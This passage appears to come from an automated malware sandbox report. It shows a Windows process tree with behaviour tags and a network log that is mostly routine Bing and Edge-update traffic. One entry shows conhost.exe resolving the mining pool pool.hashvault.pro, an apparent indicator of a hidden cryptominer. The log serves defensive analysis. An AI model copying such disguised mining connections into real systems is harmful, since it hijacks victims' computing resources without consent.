I9IjQiIGFkPSI2NjEyIiByZD0iNjYxMiIgcGluZ19mcmVzaG5lc3M9InswQkE2QjIyQS03RDE2LTQ5NTMtODY0MC00NUFFNzc2RjM3RTh9Ii8-PC9hcHA-PGFwcCBhcHBpZD0ie0YzMDE3MjI2LUZFMkEtNDI5NS04QkRGLTAwQzNBOUE3RTRDNX0iIHZlcnNpb249IjEzMi4wLjI5NTcuMTQwIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iNCIgaW5zdGFsbGRhdGU9IjY2MDgiIGNvaG9ydD0icnJmQDAuOTIiPjx1cGRhdGVjaGVjay8-PHBpbmcgcj0iNCIgcmQ9IjY2MTIiIHBpbmdfZnJlc2huZXNzPSJ7Qjk4RDc5QTUtNkYxMC00QjM2LThFNDUtRTFERjMyNDc1RkI5fSIvPjwvYXBwPjwvcmVxdWVzdD4
                1⤵
                • System Location Discovery: System Language Discovery
                • System Network Configuration Discovery: Internet Connection Discovery
                PID:4688
              • C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe
                "C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe" /InvokerPRAID: Microsoft.MicrosoftOfficeHub prelaunch
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1704
              • C:\Windows\system32\wwahost.exe
                "C:\Windows\system32\wwahost.exe" -ServerName:Microsoft.MicrosoftOfficeHub.wwa
                1⤵
                • Modifies Internet Explorer settings
                • Modifies registry class
                • Suspicious use of SetWindowsHookEx
                PID:3480

              Network

              • flag-us
                DNS
                g.bing.com
                Remote address:
                8.8.8.8:53
                Request
                g.bing.com
                IN A
                Response
                g.bing.com
                IN CNAME
                g-bing-com.ax-0001.ax-msedge.net
                g-bing-com.ax-0001.ax-msedge.net
                IN CNAME
                ax-0001.ax-msedge.net
                ax-0001.ax-msedge.net
                IN A
                150.171.28.10
                ax-0001.ax-msedge.net
                IN A
                150.171.27.10
              • flag-us
                GET
                https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=000cbb74d0724e4cbc417475dc297b0c&localId=w:376360DD-BFBE-CDFD-62F7-2F46AA5C12A4&deviceId=6966574813691752&anid=
                Remote address:
                150.171.28.10:443
                Request
                GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=000cbb74d0724e4cbc417475dc297b0c&localId=w:376360DD-BFBE-CDFD-62F7-2F46AA5C12A4&deviceId=6966574813691752&anid= HTTP/2.0
                host: g.bing.com
                accept-encoding: gzip, deflate
                user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                Response
                HTTP/2.0 204
                cache-control: no-cache, must-revalidate
                pragma: no-cache
                expires: Fri, 01 Jan 1990 00:00:00 GMT
                set-cookie: MUID=04F9B9F4A64065C718FCAC64A7CB64C8; domain=.bing.com; expires=Sun, 08-Mar-2026 16:46:37 GMT; path=/; SameSite=None; Secure; Priority=High;
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                access-control-allow-origin: *
                x-cache: CONFIG_NOCACHE
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: 85B7033361BE4EFCB2F52E4702DC78DA Ref B: FRA31EDGE0516 Ref C: 2025-02-11T16:46:37Z
                date: Tue, 11 Feb 2025 16:46:37 GMT
              • flag-us
                GET
                https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=000cbb74d0724e4cbc417475dc297b0c&localId=w:376360DD-BFBE-CDFD-62F7-2F46AA5C12A4&deviceId=6966574813691752&anid=
                Remote address:
                150.171.28.10:443
                Request
                GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=000cbb74d0724e4cbc417475dc297b0c&localId=w:376360DD-BFBE-CDFD-62F7-2F46AA5C12A4&deviceId=6966574813691752&anid= HTTP/2.0
                host: g.bing.com
                accept-encoding: gzip, deflate
                user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                cookie: MUID=04F9B9F4A64065C718FCAC64A7CB64C8
                Response
                HTTP/2.0 204
                cache-control: no-cache, must-revalidate
                pragma: no-cache
                expires: Fri, 01 Jan 1990 00:00:00 GMT
                set-cookie: MSPTC=uDfwvQQRqh9coIMx3Nm9bA9ltdLN_j9GQiA6jCEUQBo; domain=.bing.com; expires=Sun, 08-Mar-2026 16:46:38 GMT; path=/; Partitioned; secure; SameSite=None
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                access-control-allow-origin: *
                x-cache: CONFIG_NOCACHE
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: BB6A2EE76E2E45439450B50C36CE6CE6 Ref B: FRA31EDGE0516 Ref C: 2025-02-11T16:46:38Z
                date: Tue, 11 Feb 2025 16:46:38 GMT
              • flag-us
                GET
                https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=000cbb74d0724e4cbc417475dc297b0c&localId=w:376360DD-BFBE-CDFD-62F7-2F46AA5C12A4&deviceId=6966574813691752&anid=
                Remote address:
                150.171.28.10:443
                Request
                GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=000cbb74d0724e4cbc417475dc297b0c&localId=w:376360DD-BFBE-CDFD-62F7-2F46AA5C12A4&deviceId=6966574813691752&anid= HTTP/2.0
                host: g.bing.com
                accept-encoding: gzip, deflate
                user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                cookie: MUID=04F9B9F4A64065C718FCAC64A7CB64C8; MSPTC=uDfwvQQRqh9coIMx3Nm9bA9ltdLN_j9GQiA6jCEUQBo
                Response
                HTTP/2.0 204
                cache-control: no-cache, must-revalidate
                pragma: no-cache
                expires: Fri, 01 Jan 1990 00:00:00 GMT
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                access-control-allow-origin: *
                x-cache: CONFIG_NOCACHE
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: E3185A03462C448FAD7CFBC93F096D0C Ref B: FRA31EDGE0516 Ref C: 2025-02-11T16:46:38Z
                date: Tue, 11 Feb 2025 16:46:38 GMT
              • flag-us
                DNS
                pool.hashvault.pro
                conhost.exe
                Remote address:
                8.8.8.8:53
                Request
                pool.hashvault.pro
                IN A
                Response
                pool.hashvault.pro
                IN A
                80.240.16.67
                pool.hashvault.pro
                IN A
                192.248.189.11
              • flag-us
                DNS
                msedge.api.cdp.microsoft.com
                Remote address:
                8.8.8.8:53
                Request
                msedge.api.cdp.microsoft.com
                IN A
                Response
                msedge.api.cdp.microsoft.com
                IN CNAME
                api.cdp.microsoft.com
                api.cdp.microsoft.com
                IN CNAME
                glb.api.prod.dcat.dsp.trafficmanager.net
                glb.api.prod.dcat.dsp.trafficmanager.net
                IN A
                52.252.28.242
              • flag-us
                DNS
                msedge.api.cdp.microsoft.com
                Remote address:
                8.8.8.8:53
                Request
                msedge.api.cdp.microsoft.com
                IN A
              • flag-us
                POST
                https://msedge.api.cdp.microsoft.com/api/v2/contents/Browser/namespaces/Default/names?action=batchupdates
                Remote address:
                52.252.28.242:443
                Request
                POST /api/v2/contents/Browser/namespaces/Default/names?action=batchupdates HTTP/2.0
                host: msedge.api.cdp.microsoft.com
                cache-control: no-cache
                pragma: no-cache
                content-type: application/json
                user-agent: Microsoft Edge Update/1.3.195.43;winhttp
                x-old-uid: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                ms-correlationid: {D15C1C74-7076-491B-87F8-914EBFA52440}
                ms-requestid: {E3E6736C-D7F4-4D15-B1FD-0ACE7C807382}
                ms-cv: dBxc0XZwG0mH+JFOv6UkQA.0
                x-last-hr: 0x0
                x-last-http-status-code: 0
                x-retry-count: 0
                x-http-attempts: 1
                content-length: 2540
                Response
                HTTP/2.0 200
                content-type: text/plain; charset=utf-8
                content-type: application/json; charset=utf-8
                date: Tue, 11 Feb 2025 16:47:30 GMT
                content-length: 298
                ms-correlationid: d15c1c74-7076-491b-87f8-914ebfa52440
                ms-requestid: e3e6736c-d7f4-4d15-b1fd-0ace7c807382
                ms-cv: {D15C1C74-7076-491B-87F8-914EBFA52440}.0
              • flag-us
                POST
                https://msedge.api.cdp.microsoft.com/api/v1.1/internal/contents/Browser/namespaces/Default/names/msedge-stable-win-x64/versions/132.0.2957.140/files?action=GenerateDownloadInfo&foregroundPriority=false
                Remote address:
                52.252.28.242:443
                Request
                POST /api/v1.1/internal/contents/Browser/namespaces/Default/names/msedge-stable-win-x64/versions/132.0.2957.140/files?action=GenerateDownloadInfo&foregroundPriority=false HTTP/2.0
                host: msedge.api.cdp.microsoft.com
                cache-control: no-cache
                pragma: no-cache
                content-type: application/json
                user-agent: Microsoft Edge Update/1.3.195.43;winhttp
                x-old-uid: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                ms-correlationid: {D15C1C74-7076-491B-87F8-914EBFA52440}
                ms-requestid: {AD348AE3-CF03-40A2-9028-B95A8B919DBD}
                ms-cv: dBxc0XZwG0mH+JFOv6UkQA.1
                x-last-hr: 0x0
                x-last-http-status-code: 0
                x-retry-count: 0
                x-http-attempts: 1
                content-length: 2
                Response
                HTTP/2.0 200
                content-type: text/plain; charset=utf-8
                content-type: application/json; charset=utf-8
                date: Tue, 11 Feb 2025 16:47:30 GMT
                content-length: 5339
                ms-correlationid: d15c1c74-7076-491b-87f8-914ebfa52440
                ms-requestid: ad348ae3-cf03-40a2-9028-b95a8b919dbd
                ms-cv: {D15C1C74-7076-491B-87F8-914EBFA52440}.0
              • flag-us
                DNS
                msedge.b.tlu.dl.delivery.mp.microsoft.com
                Remote address:
                8.8.8.8:53
                Request
                msedge.b.tlu.dl.delivery.mp.microsoft.com
                IN A
                Response
                msedge.b.tlu.dl.delivery.mp.microsoft.com
                IN CNAME
                star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com
                star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com
                IN CNAME
                cdp-f-tlu-net.trafficmanager.net
                cdp-f-tlu-net.trafficmanager.net
                IN CNAME
                edge.ds-c7114-microsoft.global.dns.qwilted-cds.cqloud.com
                edge.ds-c7114-microsoft.global.dns.qwilted-cds.cqloud.com
                IN A
                91.80.49.86
                edge.ds-c7114-microsoft.global.dns.qwilted-cds.cqloud.com
                IN A
                91.81.130.134
                edge.ds-c7114-microsoft.global.dns.qwilted-cds.cqloud.com
                IN A
                91.81.129.182
                edge.ds-c7114-microsoft.global.dns.qwilted-cds.cqloud.com
                IN A
                91.81.129.180
                edge.ds-c7114-microsoft.global.dns.qwilted-cds.cqloud.com
                IN A
                91.80.49.20
              • flag-it
                HEAD
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                HEAD /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 200 OK
                Date: Tue, 11 Feb 2025 16:47:36 GMT
                Content-Type: application/octet-stream
                Content-Length: 177180216
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c80984b-2915334016-1
                Ocn-Served-By: QLT
                Accept-Ranges: bytes
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=0-1119
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:47:36 GMT
                Content-Type: application/octet-stream
                Content-Length: 1120
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c809d89-2915334016-2
                Ocn-Served-By: QLT
                Content-Range: bytes 0-1119/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=1120-3036
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:47:42 GMT
                Content-Type: application/octet-stream
                Content-Length: 1917
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c814b49-2915334016-3
                Ocn-Served-By: QLT
                Content-Range: bytes 1120-3036/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=3037-3736
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:47:45 GMT
                Content-Type: application/octet-stream
                Content-Length: 700
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c818e85-2915334016-4
                Ocn-Served-By: QLT
                Content-Range: bytes 3037-3736/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=3737-8877
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:47:46 GMT
                Content-Type: application/octet-stream
                Content-Length: 5141
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c81c750-2915334016-5
                Ocn-Served-By: QLT
                Content-Range: bytes 3737-8877/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=8878-15319
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:47:47 GMT
                Content-Type: application/octet-stream
                Content-Length: 6442
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c81d1b9-2915334016-6
                Ocn-Served-By: QLT
                Content-Range: bytes 8878-15319/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=15320-25963
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:47:49 GMT
                Content-Type: application/octet-stream
                Content-Length: 10644
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c8205a5-2915334016-7
                Ocn-Served-By: QLT
                Content-Range: bytes 15320-25963/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=25964-29882
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:47:49 GMT
                Content-Type: application/octet-stream
                Content-Length: 3919
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c820da2-2915334016-8
                Ocn-Served-By: QLT
                Content-Range: bytes 25964-29882/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
